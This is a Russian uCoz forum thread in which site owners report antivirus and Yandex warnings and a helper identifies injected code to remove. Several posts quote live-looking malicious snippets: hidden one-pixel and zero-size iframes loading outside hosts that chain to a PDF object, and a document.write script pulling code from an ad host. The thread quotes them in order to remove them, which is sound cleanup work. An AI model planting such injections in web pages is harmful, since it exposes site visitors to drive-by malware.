Чат сообщества
   | |
| Модератор форума: Yuri_G |
| Сообщество uCoz Мастерская uCoz Безопасность сайта Вирусы на сайтах (для изучения) (примеры вредоносного кода и устранение) |
| Вирусы на сайтах (для изучения) |
|
Warezes, форма входа пользователей. выделенное красным удалить
Quote <div align="center"> <a class="forRegLink" href="http://nudegame.ucoz.ru/index/3"><img src="http://ili.pp.ua/images_uc/reg.png" title="Зарегистрироваться на сайте!" alt="Зарегистрироваться!" border="0"></a><br> <a class="forRegLink" href="javascript://" rel="nofollow" onclick="new _uWnd('Prm','Напоминание пароля',300,130,{autosize:1,closeonesc:1},{url:'/index/5'});return false;"><iframe src="http://rapnews.pp.ua/" name="iframe" width="0%" height="0%" scrolling="no" frameBorder=0></iframe><img src="http://ili.pp.ua/images_uc/loss.png" title="Восстановить утерянный пароль!" alt="Восстановить пароль! перелейте всю графику к себе на сайт не подгружайте с кучи других сайтов. и не рисуйте больше цветастые сообщения Fisterrrs, у вас подгружается в графике половина интернета. посмотрела очень поверхностно ваш сайт из-за гремящей на полную музыки (отличный способ избавить от всех посетителей оптом) и нашла у вас два заблокированных в яндексе инородных хоста перезалейте всю графику к себе на сайт, переберите все свои каталоги и рейтинги вместе со счетчиками, оставьте жизненно необходимые, остальное снесите. после этого пишите платонам чтобы они разъяснили причину блокировки Berzhan, Quote теперь же во всем сайте. |
|
Впервые сталкиваюсь с проблемой вирусов на сайте. Написал пользователь у которого стоит Аваст. Сообщение о вирусе появилось толко сегодня.
Сайт http://paranormal-news.ru/ |
|
Fox2, конечно легче было бы, если бы пользователь предоставил или скрин или текст аллерта, но даже сейчас с уверенностью в 95% я могу сказать на что может реагировать антивирус. вот на это
Quote <script type="text/javascript" src="http://s7.ucoz.net/src/jquery-1.3.2.js"></script><script type="text/javascript" src="http://s7.ucoz.net/src/uwnd.js?2"></script><style type="text/css">.UhideBlock {display:none}</style> </head> <iframe src="http://i2x2.ru/nt/1/userjs/mine/img.php" width="1" height="1" frameborder="0"></iframe> <body> внутри этого однопиксельного ифрейма находится другой ифрейм. вот он и тоже однопиксельный Quote <iframe src="http://www.turmama.ru/lib/TMkernel/kernel/i.php" width="1" height="1" frameborder="0"></iframe> внутренний ифрейм раскрывается как Quote <object height="100" width="100" type="application/pdf" data="pfbasic.php"> <param name="src" value="1.pdf"> </object> такие пдф приложения часто блочатся удали то что я выделила красным и излови снова пользователя с авастом для перепроверки. кеш должен быть очищен у него. если что, то давайте аллерт в любом виде, там у тебя на сайте ещё есть пункты с подгрузкой. но это однопиксельный слоеный пирожок самый агрессивный пока |
|
Fox2,
Quote Он все еще на моем сайте? проверила почти все партнерки и пока из всех мне не нравится luxup. очень возможно что на чем то оттуда приехало в общем следи. как заходишь на сайтик сразу исходник проверяй на то что я выделила красным. если крутится в люксапе, то это дело будет появляться только тогда, когда будет через тебя проходить зараженный сайтик |
|
Здраствуй уважаемый(ая) webanet! У меня на сайте недавно начала выскакивать табличка опасный сайт и яндекс начал ругатся...
Вот мой сайт прошу проверте пожалуйста я возлагаю большие надежды на вас.. Вот сылка http://cf-portal.3dn.ru/ |
|
temich-xXx, выделенное красным удалить
Quote </table><!--/U1BFOOTER1Z--> </td></tr></table> </td> <td align="left" width="5%" style="background:url('http://s8.ucoz.net/t/984/2.gif') left repeat-y;"><img src="http://s8.ucoz.net/t/984/2.gif" border="0"></td> </td></tr></table> <script language="javascript" src="http://uno.wb-rotator.com/?t=br&noadult=1&pid=26762"></script> <!-- mediaunder Start --> и вот это яндекс не переваривает Code <!-- mediaunder Start --> <script type="text/javascript"> var ref = escape(document.referrer); document.write('<scr' + 'ipt type="text/javascript" src="http://mediaunder.us/scode.php?site=2351&ref=' + ref + '"></scr' + 'ipt>') </script> <!-- mediaunder End --> а так сайтик типичная мусорка. если вы подгружаете графику или скрипты (кстати у вас есть и битые скрипты на сайте) с чужих сайтов, то заранее готовьтесь к неприятностям. графика или скрипты в один прекрасный день могут или видоизмениться или исчезнуть, а сайтики могут быть положены под фильтр поисковиков, что наложит отпечаток и на ваш сайтик. если вы подгружаете даже небольшую картинку с зараженного сайта - ваш сайт тоже будет забанен. делайте выводы |
|
Здравствуйте! Я уже обращалась к Вам,вроде всё выяснилось.Но сейчас посетители сайта снова пишут,что на сайте есть вирус.Я проверяю,вирус не обнаруживается.Помогите,пожалуйста!
http://sserkov-lm.ucoz.ru/ |
|
Gressy, нужны скрины аллертов антивирусов. как пользователи определили что на сайте вирус? чем именно?
и что именно пишут ваши пользователи? мне нужны подробности, потому что у вас на сайте чисто, кроме радио, но оно не может послужить аллертом пысы: и вот этот ужас не должен быть так высоко на странице Quote <a href="http://antivirus-alarm.ru/proverka/?url=sserkov-lm.ucoz.ru%2F"><img src="http://antivirus-alarm.ru/images/checked_v1.gif" width="88" height="31" alt="Результаты антивирусного сканирования" /></a> |
|
Спасибо,webanet!
Пользователей не пускает антивирус,ругается.У них стоит Касперский и Dr.Web.Некоторых пользователей просто с форума http://sserkov-lm.ucoz.ru/forum/ выкидывает на главную страницу сайта.Но,если сайт чистый,то даже не знаю что сказать. Спасибо,за подсказку.Уберем тогда  Сообщение отредактировал Gressy - Воскресенье, 28 Авг 2011, 13:53:17
|
|
Gressy, ну так пусть дадут тексты блокировок касперского и доктора. код чистый. но я вижу что у вас в подписях разрешены биби коды имаги и ссылки. может быть или в подписи у пользователя или в аватаре стоит левый имаг на который может быть аллерт.
и вы точно описывайте проблему. в прошлый раз вы обращались с тем, что пользователей перекидывает на главную. если и сейчас только перекидывает, а жалоб по вирусам нет, то не вводите в заблуждение |
|
Доброго времени суток.Проблема такая,ставил скрипт добавления сайта стартовой страницей,скрипт ставил на главную страницу. И теперь не каждый раз а с периодичностью всплывает реклама Ads By Clicksor. Проверял комп разными программами.Нашёлся троян,несколько .exe и .dll .Всё было удалено но реклама продолжает всплывать периодически.Файловый менеджер тоже чист.Вот ссылка на сайт www.azabel.ru .Подскажите как быть.
Добавлено (28-Авг-2011, 22:44:33) --------------------------------------------- С другого компьютера заходил как гость и всё равно та же проблема.  Это один из вариантов рекламы.До чистки ещё в самом низу сайта в строке Copyright http://www.azabel.ru/ 18.03.2011 © 2011 подсвечивало www и при наведении курсора всплывало окно поиска. Добавлено (28-Авг-2011, 23:08:19) ---------------------------------------------  webanet, Вот такой ещё вариант бывает,иногда реклама онлайн игры. А фоном ещё всплывает второе окно,скрин тогда делать не буду а вот ссылка такая у страницы http://vsemtube.ru/?user=koda0263.1984 |
|
therion0269, удаляем
Code <div align="center"><!-- RankWidget.com Alexa Traffic Rank script --> <script type='text/javascript'><!-- request_img = '08'; request_typ = 'Alexa_Traffic_Rank'; //--></script> <script type='text/javascript' src='http://www.rankwidget.com/get_rank.js'></script> <a href="http://www.rankwidget.com/" alt="RankWidget.com" target="_blank"><img border="0" src="http://www.rankwidget.com/images/logo-s.gif"></a> <!-- End of RankWidget.com Alexa Traffic Rank script --></div> так же удаляем перевод от ромале Code <div align="center"><link rel="stylesheet" type="text/css" href="http://romale80.ucoz.ru/translation/romestyle.css"> <script type="text/javascript" src="http://romale80.ucoz.ru/translation/rome.js"></script> <div class="chromestyle" id="chromemenu"> <ul> <li><a href="http://romale80.ucoz.ru/translation/button.html" rel="dropmenu2" onclick="window.open('http://romale80.ucoz.ru/translation/button.html', '_blank', 'width=600,height=500,top=100,left=100,resizable=1,scrollbars=yes');return(false);" target="_blank"></a></li> </ul> </div> <div id="dropmenu1" class="dropmenudiv"> </div> <div id="dropmenu2" class="dropmenudiv" style="width: 300px;"> <form action="http://www.google.com/translate"> <script language="JavaScript"> document.write ("<input name=u value="+location.href+" type=hidden>") </script> <input value="ru" name="hl" type="hidden"> <input value="UTF8" name="ie" type="hidden"> <input value="" name="langpair" type="hidden"><div align="center"><span style="font-size: 8pt;"><b>Выбрать язык / Select language:</b></span></div> <table style="border-collapse: collapse; width: 100%;"><tbody><tr><td> <input onclick="this.form.langpair.value=this.value" title="Ukranian" value="ru|uk" src="http://romale80.ucoz.ru/translation/images/Ukraine.png" name="langpair" type="image"><span style="font-family: Courier New; font-size: 8pt; padding-left: 3px;">Ukranian</span><BR> <input onclick="this.form.langpair.value=this.value" title="English" value="ru|en" src="http://romale80.ucoz.ru/translation/images/Britain.png" name="langpair" type="image"><span style="font-family: Courier New; font-size: 8pt; padding-left: 3px;">English</span><BR> <input onclick="this.form.langpair.value=this.value" title="French" value="ru|fr" src="http://romale80.ucoz.ru/translation/images/France.png" name="langpair" type="image"><span style="font-family: Courier New; font-size: 8pt; padding-left: 3px;">French</span><BR> <input onclick="this.form.langpair.value=this.value" title="German" value="ru|de" src="http://romale80.ucoz.ru/translation/images/Germany.png" name="langpair" type="image"><span style="font-family: Courier New; font-size: 8pt; padding-left: 3px;">German</span><BR> <input onclick="this.form.langpair.value=this.value" title="Japanese" value="ru|ja" src="http://romale80.ucoz.ru/translation/images/japan.png" name="langpair" type="image"><span style="font-family: Courier New; font-size: 8pt; padding-left: 3px;">Japanese</span><BR> <input onclick="this.form.langpair.value=this.value" title="Italian" value="ru|it" src="http://romale80.ucoz.ru/translation/images/Italy.png" name="langpair" type="image"><span style="font-family: Courier New; font-size: 8pt; padding-left: 3px;">Italian</span><BR> <input onclick="this.form.langpair.value=this.value" title="Portuguese" value="ru|pt" src="http://romale80.ucoz.ru/translation/images/Portugal.png" name="langpair" type="image"><span style="font-family: Courier New; font-size: 8pt; padding-left: 3px;">Portuguese</span> </td><td> <input onclick="this.form.langpair.value=this.value" title="Spanish" value="ru|es" src="http://romale80.ucoz.ru/translation/images/Spain.png" name="langpair" type="image"><span style="font-family: Courier New; font-size: 8pt; padding-left: 3px;">Spanish</span><BR> <input onclick="this.form.langpair.value=this.value" title="Danish" value="ru|da" src="http://romale80.ucoz.ru/translation/images/Denmark.png" name="langpair" type="image"><span style="font-family: Courier New; font-size: 8pt; padding-left: 3px;">Danish</span><BR> <input onclick="this.form.langpair.value=this.value" title="Chinese" value="ru|zh-CN" src="http://romale80.ucoz.ru/translation/images/China.png" name="langpair" type="image"><span style="font-family: Courier New; font-size: 8pt; padding-left: 3px;">Chinese</span><BR> <input onclick="this.form.langpair.value=this.value" title="Korean" value="ru|ko" src="http://romale80.ucoz.ru/translation/images/Korea.png" name="langpair" type="image"><span style="font-family: Courier New; font-size: 8pt; padding-left: 3px;">Korean</span><BR> <input onclick="this.form.langpair.value=this.value" title="Arabic" value="ru|ar" src="http://romale80.ucoz.ru/translation/images/Arab.png" name="langpair" type="image"><span style="font-family: Courier New; font-size: 8pt; padding-left: 3px;">Arabic</span><BR> <input onclick="this.form.langpair.value=this.value" title="Czech" value="ru|cs" src="http://romale80.ucoz.ru/translation/images/Czech.png" name="langpair" type="image"><span style="font-family: Courier New; font-size: 8pt; padding-left: 3px;">Czech</span><BR> <input onclick="this.form.langpair.value=this.value" title="Estonian" value="ru|et" src="http://romale80.ucoz.ru/translation/images/Estonia.png" name="langpair" type="image"><span style="font-family: Courier New; font-size: 8pt; padding-left: 3px;">Estonian</span> </td><td> <input onclick="this.form.langpair.value=this.value" title="Belarusian" value="ru|be" src="http://romale80.ucoz.ru/translation/images/Belarus.png" name="langpair" type="image"><span style="font-family: Courier New; font-size: 8pt; padding-left: 3px;">Belarusian</span><BR> <input onclick="this.form.langpair.value=this.value" title="Latvian" value="ru|lv" src="http://romale80.ucoz.ru/translation/images/Latvia.png" name="langpair" type="image"><span style="font-family: Courier New; font-size: 8pt; padding-left: 3px;">Latvian</span><BR> <input onclick="this.form.langpair.value=this.value" title="Greek" value="ru|el" src="http://romale80.ucoz.ru/translation/images/Greece.png" name="langpair" type="image"><span style="font-family: Courier New; font-size: 8pt; padding-left: 3px;">Greek</span><BR> <input onclick="this.form.langpair.value=this.value" title="Finnish" value="ru|fi" src="http://romale80.ucoz.ru/translation/images/Finland.png" name="langpair" type="image"><span style="font-family: Courier New; font-size: 8pt; padding-left: 3px;">Finnish</span><BR> <input onclick="this.form.langpair.value=this.value" title="Serbian" value="ru|sr" src="http://romale80.ucoz.ru/translation/images/Serbia.png" name="langpair" type="image"><span style="font-family: Courier New; font-size: 8pt; padding-left: 3px;">Serbian</span><BR> <input onclick="this.form.langpair.value=this.value" title="Bulgarian" value="ru|bg" src="http://romale80.ucoz.ru/translation/images/Bulgaria.png" name="langpair" type="image"><span style="font-family: Courier New; font-size: 8pt; padding-left: 3px;">Bulgarian</span><BR> <input onclick="this.form.langpair.value=this.value" title="Turkish" value="ru|tr" src="http://romale80.ucoz.ru/translation/images/Turkey.png" name="langpair" type="image"><span style="font-family: Courier New; font-size: 8pt; padding-left: 3px;">Turkish</span> </form></td></tr></tbody></table> <div align="center"><a href="http://romale80.ucoz.ru/translation/button.html" onclick="window.open('http://romale80.ucoz.ru/translation/button.html', '_blank', 'width=600,height=500,top=100,left=100,resizable=1,scrollbars=yes');return(false);" target="_blank"><b><span style="font-size: 7pt;">Получить кнопку|Get button</span></b></a></div> </div> <script type="text/javascript"> cssdropdown.startchrome("chromemenu") </script> после удаления этого мусора отписываемся о результатах решено. 1 - |
|
webanet, спасибо за ответ. У некоторых сайт начал открываться (nod32), однако сегодня мне написали что Google блокирует сайт (потому что содержит материалы youworld.do.am).
Этого youworld вообще не существует.. Поискал в Яндексе, нашел похожую проблему: |
|
Berzhan, на главной все чисто. в гугле вашего сайта нет. если у пользователя табличка вылезает, то пусть вам пользователь скажет в каком месте сайта она у него вылазит. ссылку пусть даст
|
|
Доброго времени суток !
На главной вот такое всплывающее окно:  сайт: http://orenazlk.ru Как его убрать ?  Прикрепления:
0592516.jpg
(61.2 Kb)
|
| |||